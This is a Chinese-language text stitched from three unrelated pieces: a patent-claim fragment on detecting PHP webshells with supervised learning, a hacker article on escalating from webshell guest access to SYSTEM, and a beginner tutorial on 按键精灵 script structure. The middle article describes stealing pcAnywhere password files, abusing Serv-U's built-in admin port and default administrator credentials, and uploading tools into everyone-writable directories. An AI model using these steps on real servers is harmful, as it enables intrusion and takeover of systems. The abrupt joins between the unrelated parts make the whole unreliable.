检测模块，用于利用构建的监督学习算法对所述第一中间字节码数据进行识别，获得所述待检测网页的webshell检测结果，其中，所述监督学习算法包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行训练得到的webshell检测模型。 2

服务器提权的介绍和方法

现在可以说网络管理员对服务器的设置是越来越BT，但BT的同时，也有黑客朋友们对服务器的不断的测试，在测试中往往获取最低的guest权限是简单的，像我们在入侵网站过程中，获取webshell是简单的，但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法，但是在思考的过程中，又不得不承认，方法是不断的探索中出来的，方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍，对提权的方法进行一些介绍，同时也希望在更多朋友的不断回复中能够丰富我们的方法。 首先要说明的是，过早的一些漏洞我们就不再多说了，只说一些现在可以见到的吧。还有就是本文的题目是webshell下的服务器提权方法。 下面我们就进入主题，对webshell的提权方法！ 首先我们要明确的是，提权一般是依靠主机所开通的服务，利用服务存在的漏洞和管理员设置的疏忽进行提权的，不过也不排除一些SB的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。 在获取webshell后，我们常见的是看一下系统的服务，查看服务可以通过利用扫描器对服务器ip进行扫描，或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。首先我们说一下从简单的开始说起： 1.pcanywhere的提权方法 pcanywhere软件我想大家都了解，为什么将它放在首位就是因为读取密码后直接连接就可以了，如果对方主机在开通了pcanywhere的服务端的话，我们看能否跳转到这个目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\，如果行那就最好了，直接下载它的CIF文件，然后使用pcanywhere的密码读取器得到pcAnywhere密码，然后使用pcanywhere登陆即可!接下来就是可视化操作了。 2.Serv-U提权方法 Serv-u可以说是网络上比较火的一款FTP服务器软件，有许多像我这样的小黑们都是看系统服务中是否有Serv-u的系统进程来进行提权的。Serv-u的提权方法针对不同的版本也有不同的方法，这里我们就列举一二，可能不是很全，但在其他网友的回复中能够不断的补充吧！ a.serv-U本地提权:serv-U本地提权一般是利用溢出程序对serv-u的设置上的缺陷进行添加超级账户的功效。例如Xiaolu写的serv-u.exe就是利用sevr-u的默认管理端口，管理员账号和密码进行提权的，默认本地管理端口是：43958，默认管理员：LocalAdministrator，默认密码：#l@$ak#.lk;0@P，这是集成在Serv-u内部的，可以以Guest权限来进行连接，对Serv-u进行管理，利用本地提权的关键就是寻找服务器文件目录中的everyone权限目录，下面我给大家列举些常见的everyone权限目录： c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制，很多时候没作限制，把提升权限的工具上传上去，然后执行c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\Documents\ 很多时候data目录不行，试试这个很多主机都是erveryone 完全控制！ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP）

零基础学按键精灵(第一章)

程序结构介绍 此文为小妖首发于按键精灵论坛。借百度平台转发，希望能够帮到学按键的朋友。 当然，我自己也是一个新手，只不过，我能看一点代码，做点帮助自己的减少工作量的脚本。也达不到那些大神们，对API、dos（貌似有更多东西，可惜我只知道这些）等等理解深刻理解的大神那样，做到自己写代码优化脚本。我只能站在这些大神们做好的东西上，去做一些自己喜欢做的事。 估计很多人和我当初一样迷茫。看着按键的教程，学按键教程里面录制、跳转标记、找色、找图、找字。然后弄出个满是goto。。。的脚本。最后自己都不知道脚本写的是什么。 一开始就学补血、补篮、找图打怪。不仅弄出来的脚本，自己糊涂，给别人看，别人都糊涂。 那怎么徐徐渐进呢？ 个人理解来说，我们应该从小到大。 实际上，按键是基于VBS开发出来的（不知道这句话对不对，反正就是类似VB。。。）。 一个脚本，基本上都遵循着程序结构来写的。 这儿介绍3种基本的程序结构：

1. 顺序结构。顺序结构就是按照运行顺序决定。 比如： 1.TracePrint "第一次" //调试显示“第一次” 2.TracePrint "第二次" //调试显示“第二次” 3.TracePrint "第三次" //调试显示“第三次” 这段代码，就是依次显示第一次第二次第三次。 一条一条的运行，一条一条的显示。当然，这儿你完全可以单步调试来查看运行顺序。 2.选择结构。选择结构是判断一个值，是否为真，为真的话怎么样，为假的话怎么样。 比如： 1.If 1 = 1 Then //判断 1=1 是否成立 2. TracePrint "真的相等" //成立则调试显示真的相等 3. Else //如果不成立 4. TracePrint "不相等" //不成立则显示不相等 5.End if //判断语句结束 这段代码，第一句的时候，就在做判断，是否相等，相等就执行紧接着的那条，不相等的话，就执行Else 后面的那条。双斜杠// 后面的字是注释，不会直接运行。这儿是用来给大家解释语句的。可以删除，不影响脚本运行。 3.循环结构。循环结构有很多。比如，do … loop 循 环While … wend 循环for … Next循环等等。我这儿不是教程，也就不一一介绍，大家可以去找相关教程。